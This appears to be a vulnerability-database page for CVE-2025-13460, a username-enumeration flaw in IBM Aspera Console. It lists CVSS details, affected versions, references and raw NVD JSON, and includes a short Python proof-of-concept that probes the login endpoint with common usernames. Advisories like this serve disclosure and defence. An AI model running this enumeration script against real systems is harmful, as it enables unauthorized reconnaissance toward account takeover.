CVE-2025-13460

Description

IBM Aspera Console 3.3.0 through 3.4.8 could allow an attacker to enumerate usernames due to an observable response discrepancy.

CVSS Details

CVSS Score

5.3

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:ibm:aspera_console:*:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:* - NOT VULNERABLE

cpe:2.3:o:microsoft:windows:-:*:*:*:*:*:*:* - NOT VULNERABLE

IBM Aspera Console 3.3.0 - 3.4.8

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests

target = 'http://target-host/aspera/console'
usernames = ['admin', 'user', 'test', 'administrator']

for user in usernames:
    response = requests.post(f'{target}/login', data={'username': user, 'password': 'wrong'})
    if 'User does not exist' not in response.text:
        print(f'Valid username found: {user}')

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-13460
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-13460
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-13460/
[4] VulDB https://vuldb.com/cve/CVE-2025-13460
[5] https://www.ibm.com/support/pages/node/7263486

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-13460", "sourceIdentifier": "[email protected]", "published": "2026-03-16T14:17:54.903", "lastModified": "2026-03-17T15:50:01.287", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "IBM Aspera Console 3.3.0 through 3.4.8 could allow an attacker to enumerate usernames due to an observable response discrepancy."}, {"lang": "es", "value": "IBM Aspera Console 3.3.0 hasta 3.4.8 podría permitir a un atacante enumerar nombres de usuario debido a una discrepancia observable en la respuesta."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-204"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:ibm:aspera_console:*:*:*:*:*:*:*:*", "versionStartIncluding": "3.3.0", "versionEndExcluding": "3.4.9", "matchCriteriaId": "51419171-DDAE-4AA6-9109-0582F2133296"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*", "matchCriteriaId": "703AF700-7A70-47E2-BC3A-7FD03B3CA9C1"}, {"vulnerable": false, "criteria": "cpe:2.3:o:microsoft:windows:-:*:*:*:*:*:*:*", "matchCriteriaId": "A2572D17-1DE6-457B-99CC-64AFD54487EA"}]}]}], "references": [{"url": "https://www.ibm.com/support/pages/node/7263486", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}